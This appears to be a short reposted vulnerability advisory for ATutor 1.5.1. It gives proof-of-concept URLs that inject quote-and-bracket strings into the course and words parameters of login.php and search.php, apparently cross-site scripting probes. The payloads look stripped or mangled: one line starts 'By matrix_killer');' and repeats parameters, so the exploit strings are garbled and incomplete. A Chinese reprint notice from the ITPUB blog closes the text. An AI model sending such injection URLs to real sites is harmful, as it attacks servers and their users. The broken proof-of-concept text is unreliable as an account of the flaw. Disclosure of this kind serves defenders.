Vulnerable Systems:
* ATutor version 1.5.1
Proof of Concepts:
The following URLs can be used to trigger the vulnerabilities:
http://localhost/tour/login.php?course=">>
http://localhost/tour/search.php?search=1&search=1 &words=">&include=all&find_in=all&display_as=pages
By matrix_killer');&include=all&find_in=all&display_as=pages&submit=Search
来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-804885/,如需转载,请注明出处,否则将追究法律责任。
转载于:http://blog.itpub.net/83980/viewspace-804885/